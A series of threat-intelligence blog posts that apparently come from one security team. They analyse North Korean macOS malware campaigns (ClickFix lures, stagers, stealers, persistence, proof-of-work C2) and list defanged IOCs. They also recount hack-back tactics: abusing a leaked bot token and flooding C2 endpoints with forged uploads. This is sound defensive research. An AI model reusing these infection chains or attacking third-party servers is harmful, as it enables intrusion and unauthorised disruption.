Today we’ll talk about two things: a rather funny interview we just had with a new Chollima, and a new malware kit we’ve identified in the wild that they’re currently spreading.

This time, it’s not a Python or JavaScript implant, but a dedicated macOS kit, featuring a couple of Mach-O binaries.

So, for the lack of a better name, we’re calling this new kit Mach-O Man.

Old habits die hard

You probably remember our previous encounters with Famous Chollima operatives. If not, here’s a recap:

Famous Chollima is a division of the infamous Lazarus Group, a hacking group linked to the North Korean government.

They often target crypto exchanges, DeFi protocols, and financial companies, although they also expand into other sectors. In recent times, they’ve started infiltrating companies by applying for legitimate job openings. Once hired, they conduct corporate espionage, including information and financial theft, while their salaries help fund their sanctioned regime.

After our first encounter in 2025, we were the first company to publicly share our experience with them, including full interview recordings, images of their faces, and indicators of compromise.

You can read all our encounters with them here.

While this may deter them for some time, time passes, and this year it happened again. Let’s take a look.

Our Talent Acquisition Specialist, and new member of our Quetzal Team, Sofía, has just received an application from a Colombian engineer going by the name “Luis Ángel”. This time it all seems (a little bit more) plausible.

But… old habits die hard, and you’ll soon see why.

Despite his young age, subtly betrayed by a not particularly well-maintained chin, Luis claims to have over eight years of experience across a wide range of languages and frameworks.

After confirming that he is Colombian, he quickly backs away from conducting the interview in Spanish, claiming instead that he is actually from Singapore and has only recently arrived in the country. When asked once more to confirm, he mumbles an excuse, smiles nervously showing his teeth, and we promptly end the interview on our end.

A Colombian who does not speak Spanish… as I said, old habits die hard.

Anyway, let’s not keep entertaining ourselves with their greatest hits over and over (which we know from memory), or we might miss their new album.

And I believe this one will be a success.

A new malware kit: Mach-O Man

I once heard that you shouldn’t sleep on your fame, or it will eventually fade. This boy band seems to live by that rule, releasing new hits non-stop.

In the past, we’ve seen malware written in Python, JavaScript (more than once), and even Go, sometimes original, sometimes loosely ported to Python. Now, however, we are facing something relatively new: compiled Mach-O (Mach Object) binaries for macOS, native to the platform.

The ruse starts with an old trick. They hijack the Telegram account of someone in the Web3 or crypto space and invite their contacts to a meeting on a website impersonating a legitimate platform like Teams, Meet, or Zoom.

Once there, the site simulates a failure and prompts the user to “copy and paste a fix into their terminal”. That “fix” is actually a command to deploy malware. This technique is known as ClickFix, and we have covered it a couple of times in the past.

Let’s take a closer look at what this kit does. The first step is a stager, a common piece of malware that prepares the ground for the full infection, in this case called teamsSDK.bin. The ClickFix command presented to the victim directly downloads and executes it.

It then communicates with its command-and-control server and downloads a fake application mimicking the platform the victim intended to visit, such as Zoom, Google, or Teams.

That application will then casually ask for your credentials in suspiciously broken English. It will fail three times in a row, even if you enter the correct password, complete with window shaking and all.

Once it has your credentials, it will begin staging basic reconnaissance data from your system, such as CPU ID, user, hostname, and installed applications.

It will keep running in the background, downloading the next stage, which could be D1YrHRTg.bin, D1ozPVNG.bin or D1yCPUyk.bin (they are, in fact, the same file). This implant acts as a profiler, enumerating information from browser extensions, including Chrome, Firefox, and Safari, network configuration and running processes. It does not exfiltrate files at this stage; it only sends a text file containing host information, preparing the ground for later exfiltration.

In an unexpected, almost heartwarming gesture, the Chollimas allowed this binary to display a helpful usage message when run without arguments.

The interesting part is that this stage loops indefinitely, sending the same host information to its C2 server via cURL over and over again, often starving the system of resources and making its presence quite obvious. But the most interesting part is that this C2 endpoint has no authentication… we’ll get there in a moment.

The next stage is minst2.bin, which establishes persistence on the system by downloading an “Antivirus Service” package from a server provided as an argument. This fake antivirus package contains a binary named remotely as localencode, but saved locally as OneDrive.

It then creates a LaunchAgent, roughly the macOS equivalent of Windows Services, to maintain persistence by executing OneDrive, which in turn instantiates the previous components on startup. It is also responsible for cleaning up traces and leftovers from the exfiltration process.

But it doesn’t end there. A payload called macrasv2 is downloaded next, acting as stealer targeting browser extension data, stored browser credentials and cookies, macOS Keychain entries, and other files of interest, and exfiltrating them via Telegram in an interesting and insecure way.

But more on that later!

I’d say this new album goes back to its roots… or, if I may repeat myself, old habits die hard: Telegram account takeovers, fake meetings, ClickFix, Telegram once again as an exfiltration channel, and insecure C2 channels.

About that…

Taming a Chollima (once again)

Their servers host multiple open services, including fake ones listening on well-known ports such as 110 (POP3). Notably, Windows Remote Desktop Protocol (RDP), WinRM (Windows Remote Management), and the Chrome Remote Desktop dashboard were found to be publicly accessible.

Their C2 server is a Go net/http server, which aligns with the User-Agent observed in the requests (Go-http-client) and the language used across all binaries.

A bad actor could reverse-engineer the logic behind the C2 server, or brute-force access to RDP or the Chrome Remote Desktop panel… but those are nerd moves. If you want to beat the malware, you have to think like the malware, act like the malware, or… well, become the malware.

After careful observation, we noticed that the /info endpoint queried by the malware does not require any form of authentication and allows arbitrary file uploads, as long as the expected User-Agent and file format are respected…

This could allow virtually anyone to impersonate the malware and flood their infrastructure with mass-produced files until their services become unusable, due to file pollution, server saturation, or account suspension, whichever comes first.

If that virtually anyone were to do so, they would only need to loop the same forged request over and over, in an effort that could be implemented in no more than five or six lines of code.

But that’s not all. Remember the Telegram-based exfiltration method?

How “insecure” is it, really?

Well, if we analyse the exfiltration attempt, we find that the operators left their Telegram Bot API token exposed.

This is an administration key that allows anyone to read incoming messages, send messages on the bot’s behalf, and interfere with its operation, potentially leading to its disruption or takedown, with just a few commands like the ones depicted below.

This would ultimately allow anyone to interact with the bot and start sending messages, effectively spamming both incoming and outgoing channels posing as the bot itself.

Eventually, the threat actor will have to take action (like stopping or blocking the bot), or be buried under thousands of notifications from his faulty sidekick.

But there’s more! This key allows anyone to identify the bot owner or creator with a simple command like the following:

And with that information, it is possible to find him on Telegram.

Meet & Greet with the Leader, here we come!

There are plenty of bad people out there who would’ve texted him and given him the scare of his life.

We don’t do that here… ; )

And so, by combining these two C2 vulnerabilities, we could easily turn this into a mass spamming campaign, flooding both the bot and the C2 infrastructure and effectively causing their worst weekend outage of the year.

The worst so far.

And April has just begun.

Jokes aside, while still recycling old tricks and shuffling them among new shiny tools, they still remain a danger at large and it takes just one of your environment to be compromised for it to get out of control really fast.

I will release a full dissassemble of this malware in a technical article soon, which will include a deeper analysis, more interesting details and other IOCs.

As usual, thanks for reading,

don’t accept random meetings,

don’t believe random sites telling you to update your tools,

update your apps only from trusted and official sources,

and please,

don’t get rekdt.

IOCs

SHA256 (com.onedrive.launcher.plist) = eb3eae776d175f7fb2fb9986c89154102ba8eabfde10a155af4dfb18f28be1b5
SHA256 (com.onedrive.launcher.tmp) = eb3eae776d175f7fb2fb9986c89154102ba8eabfde10a155af4dfb18f28be1b5
SHA256 (D1yCPUyk.bin) = 0f41fd82cac71e27c36eb90c0bf305d6006b4f3d59e8ba55faeacbe62aadef90
SHA256 (D1YrHRTg.bin) = 0f41fd82cac71e27c36eb90c0bf305d6006b4f3d59e8ba55faeacbe62aadef90
SHA256 (localencode) = a9562ab6bce06e92d4e428088eacc1e990e67ceae6f6940047360261b5599614
SHA256 (macrasv2) = 85bed283ba95d40d99e79437e6a3161336c94ec0acbc0cd38599d0fc9b2e393c
SHA256 (MauroDPRKSamples.zip) = cc31b3dc8aeed0af9dd24b7e739f183527d55d5b5ecd3d93ba45dd4aaa8ba260
SHA256 (minst2.bin) = 4b08a9e221a20b8024cf778d113732b3e12d363250231e78bae13b1f1dc1495b
SHA256 (OneDrive) = a9562ab6bce06e92d4e428088eacc1e990e67ceae6f6940047360261b5599614
SHA256 (SystemApp.zip) = 89616a503ffee8fc70f13c82c4a5e4fa4efafa61410971f4327ed38328af2938
SHA256 (TeamsApp.zip) = dfee6ea9cafc674b93a8460b9e6beea7f0eb0c28e28d1190309347fd1514dbb6
SHA256 (teamsSDK.bin) = 871d8f92b008a75607c9f1feb4922b9a02ac7bd2ed61b71ca752a5bed5448bf3
SHA256 (ZoomApp.zip) = 24af069b8899893cfc7347a4e5b46d717d77994a4b140d58de0be029dba686c9
Filename: localencode
Filename: OneDrive
Filename: teamsSDK.bin
Filename: D1YrHRTg.bin
Filename: D1yCPUyk.bin
Filename: minst2.bin
Filename: macrasv2

References

• LevelBlue Labs OTX - Original Intelligence Pulse by Quetzal Team.

But do you know what’s worse? People who build malware.

And even worse than them? People who build malware for dictators.

But why stop there? Far below that moral abyss, something else lurks: equinopods (pony-heads) with weird haircuts that committed the worst sins in this land.

The first, in a Borgesian way, was never being happy. Ever.

The second (and for me, unforgivable), to vibecode malware. Not even being capable of building your own malicious code, failing miserably at being evil and yet, somehow, still getting the punishment.

This is the story of how we met again with an old acquaintance: a malware written vibecoded in Go by our best sponsor, Famous Chollima.

And how we punished them back for weaponizing clankers.

ClickBreakFix

In the last year, our friends enriched their theatrical scripts, which included fake job interviews and simulated VC calls, with a new charade dubbed ClickFix: fake system errors that, when prompted, require the user to opportunistically download a fix, or copy and paste a “fixing” command into their terminals.

We all know where things go from there. If you don’t, pick Dante’s Inferno and it will illustrate it enough.

When you run that tool or command, you are basically executing the task with your own privileges. Anything you have access to will be considered in the context in which you are invoking that task, aside from some built-in system protections which may or may not reduce the damage.

That being said, if you, for instance, run a remote access trojan (RAT) with your user, you are allowing a North Korean agent to remote into your machine with your very same privileges, pretty much like having them sitting down by your side.

But we’re not doing that. Do you know what we are doing instead?

Time for some malware slice and dice.

Do gophers dream of affordable RAM?

Let’s start from the beginning: a faux LinkedIn invite to a Crypto Training, hosted on a phishing website mimicking the popular platform Canditech.

Once you join, of course something will go wrong. Their excuse of choice is always the same: your webcam. In order to allow the platform to access your webcam, you need to update your drivers. A troubleshooting window pops up and automagically tells you exactly what to do to solve this. Man, this is what I call good service.

But of course, these drivers are not what you think. Let’s pry them open.

Scalpel, please.

If you are running macOS like me, the website will prompt you to run a command which will download this Bash script. This is a stager that will download the Go language interpreter and a fake DriverFixerNow macOS app using Google Chrome’s icon, and then drop a malware written in Go inside a compressed file called “update.zip”.

Now if you ask me, Go is a somewhat odd choice for the DPRK, as they usually go for JavaScript and Python. Actually, the last time I saw them touching Go was when they repurposed vibecoded GoLangGhostRAT to create a Python port which we dubbed PyLangGhostRAT (and as you may have correctly guessed, it had the quality you’d expect from a Norkie vibecoder).

Weird is our specialty, so let’s do this. But let me warn you, it only gets weirder.

What a surprise! Clanker footprints everywhere!

Everything is so overexplained! Why so many comments?

Why is every single step not only numbered but commented, and also having a verbose output to the console? Who are you trying to help debug your malware, the user?

Why the space after the comment sign and the comment itself? None of my [human] devs do that.

Why do you need to comment out your evil plan step by step like some kind of weird Class B villain who is just about to get busted and could have easily gotten away with everything by just executing it instead of giving a TED talk?

That’s definitely weird and screams: “You’re absolutely right! – That’s on me! I messed up! Let me address it real quick 🚀!”

But this is just a feather of the Chollima. Let’s check the Go components.

GOTO malware

Once decompressed, the fake “update” drops a “drivfixer” shell script to launch the Go payload. In a remarkable display of transparency, it spells this out on line six, for reasons unknown to us.

The invoked Go binary is an infostealer and RAT. It initiates the infection chain by generating a unique identifier for the infected host and importing several dependencies that we analyse later.

Once again, the code is littered with unnecessary comments and awkward constructions, a textbook example of clanker engineering at its finest.

The next function is what we’ve been looking for: the infostealer.

Thanks to the generously commented code, it’s fairly easy to understand what it’s doing in the background: stealing Chrome extension data, cookies, and saved credentials.

A classic move. And I’m fairly certain we’ve seen this before, but no spoilers yet.

Another notable detail is the amount of unused code left commented out throughout the different files.

The remaining execution flow is handed off to several modules, each mapped to one or more files. For simplicity, I’ll list them without going into detail, except for one, no spoilers just yet.

• Auto: Sets paths, defines targeted extensions, and parses cookies.

• Command: Executes commands received from the operator.

• Config: Self-explanatory, but we’ll expand on this later.

• Core: Manages the malware’s communications and handles data exfiltration.

• ExtProc: Installs a fake Google Chrome instance with pre-installed malicious extensions. Now we understand why the fake macOS app used Google Chrome’s icon as a disguise!

• FileOps: Handles file uploads and downloads.

• Hardware: Collects hardware information.

• Instance: Checks whether the malware is already running, similar to a mutex.

• Message: Sends and receives internal messages.

• Transport: Establishes TCP connections.

• Util: Provides compression routines.

What’s so special about Config and why I’m keeping this under a halo of mistery for so long? Well, see by yourself.

This is the exact command dictionary used by PyLangGhostRAT, which I previously wrote about. It’s a vibecoded version of GoLangGhostRAT, converted to Python in a particularly atrocious way, and it has resurfaced once again. This boy has seen more scalpels than a Hollywood red carpet, yet it still stands.

Let’s jump to the fake macOS app. Analysing it, we identify a connection to a Django web app acting as a C2 server.

You know what time it is, right?

Time to teach them a little lesson about “command and control”…

Dear Leader

We are not sending a letter, but rather a special package (and I thought this article could still hold one last literary reference).

As expected, when we combine their poor malware development skills with clanker-engineered code, both in their C2 and their malware, we are left with something… far from optimal in terms of security.

One of their upload endpoints holds a trivial authentication mechanism that can easily be spoofed on our end and used to allegedly upload arbitrary files, such as a ZIP archive containing multiple Quetzal Team logos, or fake datasets with fake victim date to pollute their storage and make it harder to pin down real victims.

Allegedly, of course.

Normally, we’d expect such a brutish attempt to be thwarted right away with little to no effort. Either you quickly rework the authentication snippet by adding additional controls, or you take the painful route of blocking each offending IP.

I bet them being equinopods, would choose the later, but making it extra painfully by waiting at least 70-100 attempts before noticing something was amiss. Of course, each time they blocked one IP, an attacker could just jump to another VPN node and resume their upload efforts. Allegedly.

At this rate, assuming at least 50 allegedly successful uploads before they reactively block them, and with a couple of hundred IPs available in the pool (allegedly) to rotate, we can estimate the cloud server costs at… well, I’m not great at maths but we can definitely say a lot.

This article went on a little longer than expected, so it’s time to say goodbye, but not before sharing our classic tips and tricks:

Stay safe.

Don’t accept commands or applications from strangers on the internet.

Use clankers to draw ugly memes, not to code ugly malware.

Cyberbully your local threat actor.

And please, don’t get rekt.

IOCs

IPv4:144.172.93.88
IPv4:157.250.195.237
Domain:kit-haus[.]net
URL:hxxps[:]//kit-haus[.]net/mac-driver
URL:hxxp[:]//144.172.93.88:8080
URL:hxxp[:]//144.172.93.88:8088
File:gather.tar.gz
File:extdata.zip
File:CDriver.ChAudioFixer
File:ChAudioFixer.debug.dylib
File:DrivFixerNow.app
URL:hxxp[:]//144.172.93.88:8080/transfer/download/
URL:hxxp[:]//144.172.93.88:8080/transfer/upload/
URL:hxxp[:]//144.172.93.88:8080/upload/ 
URL:hxxp[:]//144.172.93.88:8080/gettext
SHA256:72f96d15c4ffb3abadcac3ec4299714f35ca4b732ad7db3d268712ee0692d713
SHA256:0a716920017fba0b70b7295c6d7a06710df38c0d6158a12d3723343919da7fd2
SHA256:97fe475a4177de4e55f3791276fb0553f28fcc19d4edb73038c1ad7238ae265f
SHA256:6ce66f7a2fe04fb451f12bcf4a1ac1c27b3fc02fac72c177d02f547c705e03e1

References

• Level Blue Labs OTX - Original Intelligence Pulse by Quetzal Team

Still here? Have a Special Edition muppet!

Of all the fates in the grand scheme of things, you drew the worst one possible: a modern slave trapped in a never-ending loop of defrauding ordinary people, companies, and even yourself. Because at the end of the day, I doubt your inner child ever yearned to become some wacko’s personal vibe coder.

On top of that, a group of weirdos hunts you like day hunts night. And once again, dawn has caught you outside your burrow.

This is the story of how we discovered (and named) POWerful Armadillo, a new DPRK malware.

Thanks to our loyal sponsor, Famous Chollima, for sharing their samples with us.

Armadillos & Quetzals

We’re used to seeing these muppets try every trick in the book, and write most of the new ones that end up in it. They may not be the most technically sophisticated actors out there, but they are definitely creative, and this campaign was no exception.

For this operation, they shifted to using compromised WhatsApp accounts to distribute a fake WebEx installer in DMG format for macOS. Once executed, you’re presented with the typical application window, but labelled “Drag to Terminal to Install.xyz”. Of course, doing so executes the “installer” in your Terminal, with your privileges and the same access level as your user.

But we’re not doing that, you mischievous pony head. You know what time it is?

Time for disassembling. Your malware, your campaign, and your dreams.

The .xyz installer is actually a Bash script that downloads the malware loader via cURL. It is interestingly disguised as a publicly accessible ASPX file, but in reality it is just another Bash script.

For the sake of simplicity, we’ll shorten the component names to four letters plus extension, as the original names are excessively long.

The first component, PNZF, downloads three additional stages: 4NWS, 2KVS and 01HY. The first and the last are piped into Bash, while the second is piped into osascript, indicating that it is in fact JavaScript code.

Let’s reconstruct the infection chain.

The second stage downloads three additional components, all written in JavaScript: T65A, DQEZ and 0CRW. Opening them, we find a rather predictable surprise: they’re obfuscated. But we know exactly which deobfuscator to use.

Does that ring a bell? It’s the exact same one they always use, and the same one we documented in our reports on BeaverTail and OtterCookie. Old habits die hard.

Component T65A prompts the user for their credentials, stores them, and replays them whenever necessary using the native macOS utility dscl.

dscl (Directory Service command line) is normally used to interact with the system’s directory services, including managing user accounts, groups, authentication data, and other attributes stored in the local directory or network directory services such as LDAP or Active Directory.

Coincidentally, DQEZ is virtually the same component, just with different deobfuscation output, but it follows the exact same execution flow.

I told you these weren’t the brightest bulbs in the house.

Moving on, 0CRW is where the real action starts. It defines a C2 server with a specific endpoint, derives a hardware-unique ID for the infected machine, and uses it to identify the host to the C2. It also runs tccutil to reset TCC permissions on the host and dumps both Apple Notes and small files from ~/Desktop, ~/Downloads, and ~/Documents, then zips and ships everything to the C2.

Classic behaviour so far, but there’s a catch: the server won’t just receive the data as-is, it will require a PoW (Proof of Work).

We’ve never seen DPRK malware require Proof of Work to protect their C2 from our spammy, friendly interview requests. That detail stuck with me for a while, so we gave it a name: POWerful Armadillo.

A challenge, then? I’m always up for one. But let me finish kicking over your sandcastle first, then I’ll move on to stomping on your shovel and bucket. We’ll be back here in a minute.

Let’s backtrack a little, as we still have two more components to explore: 2KVS and 01HY, which were loaded in the first stage.

2KVS is the stealer. It targets macOS Keychain, a long list of desktop crypto wallets/configs, browser credentials and cookies (Chromium + Firefox, including extension storage), and Telegram Desktop data, then stages everything under /tmp, zips it, and uploads it to the C2 (again with PoW gating).

01HY establishes persistence by creating a per-host LaunchAgent tied to the machine’s Hardware UUID. It downloads a JXA payload (“52VH”), stores it under Application Support, and ensures it runs at login via osascript, with KeepAlive enabled for automatic relaunch. Let’s see what 52VH does.

After deobfuscation, we’re met with the final piece of the malware. 52VH is the persistent JXA C2 agent: it fingerprints the host, polls the server, solves PoW challenges, executes remote tasks (Bash/AppleScript/JXA), and acknowledges them back to the C2.

And speaking of the devil. I haven’t forgotten about that little Proof of Work challenge the ponies decided to implement.

What do they know about hard work? Parasites in a weird uniform with weird haircuts. Let’s break that toy too.

Cracking open the Armadillo

As we’ve seen before, every interaction with the C2 is gated by a JSON response containing a “challenge” and a “complexity” level. By reading the code, we can see exactly how both values are calculated.

First, the server expects us to calculate a “nonce” (a number used only once). In this case, it’s simply an incrementing integer: the malware starts at zero and keeps increasing the value until it finds one that satisfies the server’s condition, formatted as:

<nonce>-<challenge>

It then computes the SHA-256 hash of that string. The server requires the resulting hash to begin with a specific number of leading zeroes in hexadecimal form. The number of required zeroes is determined by the complexity value. For example, a complexity of 1 requires the hash to start with a single “0”, while a complexity of 3 requires three leading zeroes.

Because cryptographic hashes are unpredictable, the only way to find a valid nonce is through brute force. The implant starts at zero and increments upward until the hash output meets the requirement. Once a valid nonce is found, it sends the solution back to the server and receives a token.

Now that we understand how it works, we can grab one of the modules where this calculation is already implemented and “neuter” it, stripping out any harmful functionality and sanitising sensitive information, while keeping the communication logic intact.

This would allow us to arbitrarily upload fake information to their C2, effectively spamming it at will. But you know the saying: new year, new me. This time, I choose to be the bigger person.

Just kidding. Let’s terrorise those invertebrate vermin.

Hardcoding different values as “REGARDS-FROM-THE-QUETZALS” and crafting a specific zip file with fake information about a fake person, we start spamming their C2 relentlessly.

For obvious reasons, we cannot disclose that, in order to arbitrarily upload files to this campaign’s servers, you simply need to run a POST request, followed by a PUT and then another POST to the endpoints depicted in this article, using the PoW resolution method we discovered. Don’t try this at home.

Well. This edition has gone on long enough. Before we jump into the IOCs, let me remind you of the basics.

Stay safe.

Don’t let spies in.

Cyberbully your local threat actor.

Spread love, not malware.

And please: Don’t get rekt.

IOCs

IPv4:62.60.226.225
Domain:hoplokiroute[.]com
Domain:hylb9pbsjaqkl03g75jomhrsitz0msicjttolxo[.]pages[.]dev
URL:hxxps://hoplokiroute[.]com/SifFSYC0iyKGie87L0tjg
URL:hxxps://hoplokiroute[.]com/wuZpFOkrxP7ih1q9wIMVOq5pPVq
URL:hxxps://hoplokiroute[.]com/hicMvddp7NAl80BkWFES19KfRs
URL:hxxps://hylb9pbsjaqkl03g75jomhrsitz0msicjttolxo[.]pages[.]dev/vlorKq3ETMPVqR9phyou88U7bPj7rHcqPft1yMxScQJiAOyV9BAJ8OpKO5Vw6SnG0Ok4nwS[.]aspx 
URL:hxxps://hylb9pbsjaqkl03g75jomhrsitz0msicjttolxo[.]pages[.]dev/KqsbHMd9o7Z8AExWh1nD9mL6LXQSL8z1euhGi4PLxvPMujgNCOTbWlCrErzX9NVcwM7X2kVS[.]aspx
URL:hxxps://hylb9pbsjaqkl03g75jomhrsitz0msicjttolxo[.]pages[.]dev/RBVr0mPp65COR4S6tThFCYIiK3ghS7A6BZimoZOHyf4MnmyRTjKxasnaKyZ9OKWIUy6O1hy[.]aspx
URL:hxxps://hylb9pbsjaqkl03g75jomhrsitz0msicjttolxo[.]pages[.]dev/iM7SGHcIcB6ZPZJRUlsu3DRR045tUbWN4mjh2inIyhAa2sXD0U3K1xlMzBjCAAKRrvCCW0q4yS6TT65a[.]aspx
URL:hxxps://hylb9pbsjaqkl03g75jomhrsitz0msicjttolxo[.]pages[.]dev/DYnBfm4yfByVEgqXSq27k67EAsq5hZeZYY8PaTAWok3YlBmi4XZeZUvkdVboEUCm1tUDqeZ[.]aspx
URL:hxxps://hylb9pbsjaqkl03g75jomhrsitz0msicjttolxo[.]pages[.]dev/xFj6OFibJ2V9C2z0g9Aa7FK5vPiUNf17NK9KLs2ZrZaAuy2h8dKomXKTBbwrjtV40crW[.]aspx
URL:hxxps://hylb9pbsjaqkl03g75jomhrsitz0msicjttolxo[.]pages[.]dev/Bc5Tg1EIVZYOgIJVIcV31JZUwXAhc4Hv7DIereUloKjH8Uhnw9vsQY9oq175PbclUjwm6bg52vH[.]aspx
SHA256:f5669d80eb52f8b6fc90f5c5db98182e7d5297073f120a67b22700bf88c17d27
SHA256:318792ed0fcb64059670956468d7e0ef62edb15c967cd1f13fa8774e5e5c28ae
SHA256:66c3d0eaf68dcc97c092ce48ed65df49a8dcb7e1c3e2137f98ad16826ee5ef8d
SHA256:0c47f6db79f5c4db86227b1fba4528ca8c2f8a1e86302863add8fd3f966b1b30
SHA256:e4677a8fb20517393a761c49075f0e4fdfe80f28f6bdeacb246e7d9b3858542f
SHA256:7f78ce8bd2c7e2ccd71fc62bcfb29ce5b0d91efaff4c51f629195efb0293184d
SHA256:ee93c0caa82ed4b362b1f13b230687cf403fea83f7a7e3090c9bbe08955878c4
SHA256:91c47f8ddb5a937c461bee6021569544e6fa009e103e6f34b59b9d342338b76d
FileName:/tmp/exec_throttle.lock

Important note: Some engines, such as Moonlock’s (whose work we love), detect this variant as “DigitStealer”. While it shares certain traits, such as using Pages[.]Dev to distribute payloads and disguising Bash scripts as ASPX files, there is little else in common so far.

On the other hand, there are several notable differences that create meaningful distance from DigitStealer: no geofencing, as the original checks for Russia and CIS countries and avoids infecting them; no modification of desktop wallet applications such as Ledger; no use of Python modules; no DNS beaconing and, most importantly, no use of Deobf-io for code obfuscation.

Also, we have confirmation from a security vendor that distribution method and traffic patterns are confidently attributed to Famous Chollima.

We therefore respectfully disagree with this classification.

So maybe, these guys recycled DigitStealer to build this new strain, pretty much like they did with GoLangGhostRAT to create PyLangGhostRAT.

References

• LevelBlue OTX - Original Intelligence Pulse by Quetzal Team.

Yes, that’s me.

You’re probably wondering how I ended up in a Zoom call with the President of Mexico, her generals, and high-level officials.

Just a normal day at the office.

Hostage Situation

It all started with a call to our CEO from an official number belonging to the Ministry of Foreign Affairs (SRE). They politely asked if he could take a call from the Secretary of Defense. Upon agreeing, the conversation moved first to WhatsApp, then to Signal.

On Signal, he received a message supposedly from the Secretary of National Defense, General Ricardo Trevilla Trejo. The message claimed to urgently need our cooperation and invited him to a Zoom briefing.

Fearing our old fencing comrades might be back for a rematch, we agreed I should go first and join the call. Just in case.

But as soon as I joined, the caller’s webcam activated automatically and began playing a deepfaked video showing Mexican President Claudia Sheinbaum, General Trevilla Trejo, and other cabinet members in what appeared to be an emergency meeting (translation below).

They discussed a hostage situation involving three Mexican citizens, stating that while they usually refuse to pay ransoms, this time would be an exception. They also expressed a desire to handle the matter discreetly, asking for everyone’s cooperation and assuring that all contributions would be appreciated and repaid once the crisis was over.

At this point, we were already involved in the negotiations without being formally asked. And while I don’t have the authority to release payments or negotiate this kind of crisis, I wasn’t going to miss the opportunity to tell all of LinkedIn about the 10 valuable lessons hostage negotiations taught me about B2B sales.

Technically speaking, the deepfake was flaky, but overall, the setup was solid. They were spoofing real phone numbers, impersonating the right people, and spear-phishing a high-value target.

Far more advanced than other threat actors we’ve fenced with in the past.

So, as a Threat Management Specialist, I had to manage this threat… in a special way.

Presidential Crisis

Time to rescue those hostages. We’ll bring you back home boys.

Our first move was to take some weight off our CEO and shift the conversation over to me. I’d handle the presidential crisis while he focused on CEO things, you know, like running LATAM’s number one crypto exchange.

Which, in case you thought otherwise, is no minor challenge.

We shared a Uruguayan decoy number with them to shift the workload onto me.

Posing as the Chief Government Affairs Officer (a title I pulled straight from thin air), I struck up a conversation with the threat actors in an attempt to lure them into our trap.

We got their interest, and their attention.

Now let’s find out what they want, how they want it, when they want it, and what they expect from us.

They name us a price, and we’ll play along with it.

Don’t worry, boys, we’ll bring you back home, even if it costs us 1300 BTC (roughly 89.5 million dollars). Let me get my wallet.

Or better yet, allow me to generate a secure internal environment with access to our cold wallets, so you can carry out the transaction yourself.

Help yourself. Take as much as you need.

We make them believe that, due to compliance restrictions, the only way to claim their nearly 100 million dollar bounty is by connecting via AnyDesk to a “secure environment”, which is actually an ANY.RUN sandbox.

Once the threat actor connects to the environment, we can record every action and extract every piece of information from them, including their IP address and every single click they make.

The muppets try to bargain, claiming they’ve set up five wallets and asking us to transfer 260 BTC to each. But I am the negotiator here.

We politely decline, stating that due to compliance limitations, we must set up a secure environment where they must manually carry out the transactions themselves.

Now for the best part: we have a whole hour to set up tricks and traps.

In the past, we’ve managed to trap and tame professional threat actors like EVILNUM, Labyrinth Chollima, Kimsuky, and Famous Chollima. All of them approached us and left recorded, mocked, and most importantly, empty-handed.

So we can definitely settle the score with these threat stuntmen. And, why not, make an example out of them.

An hour went by, and I had finished setting up our sandbox and laying down some tripwires.

Some suspicions arise. He’s afraid of installing AnyDesk.

And that’s where we have to draw a line, an interesting one.

DPRK agents use AnyDesk daily to work for remote companies under fake or stolen identities. They don’t care.

Chinese APTs literally set up legal companies just to issue valid code-signing certificates, so their malware runs as trusted software.

And you’re scared of installing AnyDesk… for the chance to win 1300 BTC?

But this is my case, I’m the negotiator here, so I convince him to keep going.

We shared the AnyDesk access code and a link to the “wallet credentials”.

Of course, if you’ve been following our posts, you already know what that link really is: a canary token. Once triggered, it reveals everything about the visitor: location, IP address, browser fingerprint and more.

And if your eyes are sharp enough, you might have noticed that the leetspeak in the URL spells out a not-so-friendly (but deserved) nickname for our guest.

The threat stuntman complains that the canary token link sends him into a never-ending redirect loop.

I calmly explain that it’s likely because he’s using a blacklisted IP (probably from a VPS or a VPN) which triggers the system to bounce the request.

He then spends a lot of time (and I do mean a lot) switching between different VPS and VPN services, desperately trying to bypass the control.

You can trip over the same stone twice.

But ten times?

That definitely sets a new record.

Finally, when laughter turns into pity and second-hand embarrassment, he starts to realise what’s going on: He’s the one being hunted.

There are no 1300 BTC. There never were.

No 100 million dollars to claim. Not even close.

It was all for nothing.

He tries to confront me, but I had already prepared a handcrafted gift just for him.

Saint Valentine’s spirit is in the air, honey.

Of course there are no credentials, you nerd!

Go touch some grass, love someone, spread pheromones. You unloved, uncared, unmoisturized threat stuntman.

And if you were counting on this money to gift your significant other something cute… I’m sorry to spoil it, bunny.

But you can have this handcrafted letter for free:

Outro

I’m not the empath type, but sometimes I like to put myself in the Threat Actor’s shoes.

Try it, just for a second.

It all looked so good. The perfect plan.

You were gonna be rich. It was your last “job” with the boys.

One last run, and you’d all retire to Cayman, Belize, Seychelles, Palau, you name it.

You’re counting the money in your head.

1300 BTC. Almost 100 million dollars.

You fantasize about anything with a price tag. And even things without one.

In your head, you’re already spending it.

But some weirdos with a green bird logo show up and call you a nerd.

There is no Cayman. There is no 1300 BTC.

The dream is gone.

You were so close!

But hey, at least you have a nice hand crafted sign for this Valentine.

Moral of the story is:

Don’t be a nerd. Spread love, not malware.

Happy Valentine’s from Quetzal Team!

IOCs

IPv4:79.127.229.179
IPv4:15.220.188.32
IPv4:38.165.237.105
IPv4:46.62.158.224
IPv4:142.93.176.189
IPv4:3.85.167.157
URL:hxxps[:]//us05web[.]zoom[.]us/j/83413214716?pwd=KYKBnV0oDagfujaE3b5lmIFuKLmSwN.1
Phone:+525536865100
Phone:+528123396516

References

• LevelBlue OTX - Original Intelligence Pulse

But all things must come to an end, and it is time to sunset this saga. That said, it should not be a sad moment, because we are giving it the ending it deserves.

So, as usual: a North Korean walks into an interview…

Córdoba

When you think of Córdoba, Argentina, many things come to mind: the accent, the musicians, the festivals, the cuckoo clock, and even the UFO sightings. The last thing you would expect is a North Korean cosplaying as a cordobés, yet here we are. If we worked only with known knowns and the predictable, this saga would not exist.

So that’s how we met Lucas Gabriel, a north-cordobés Senior Full Stack Engineer that applied for a position at our company.

Sofía, our Talent Acquisition Specialist, met him for an interview, and things immediately stopped making sense. To begin with, Lucas seemed shy and refused to turn on his camera for reasons that will become clear later in this article.

From that moment onwards, the interview was a complete disaster. Suspiciously, he did not speak Spanish at all. When Sofía encouraged him to switch to his native tongue, he excused himself by saying that he “wanted to improve his engrish” (sic).

Sofía pressed on, insisting that the role required Spanish proficiency and that they needed to continue in Spanish. He reluctantly agreed, but after her first question he froze, as if struggling to understand what she had said, or perhaps waiting for an AI to auto-translate for him, something we had seen before. Unable to answer in a reasonable timeframe, he pushed again to continue the interview in English. When she declined, he simply vanished.

But that is not where the story ends. Notice what Sofía says at the end of the clip? For those who do not speak Cervantes’ tongue, like Lucas Gabriel, she says:

“Of course he’s already gone, but we got him”

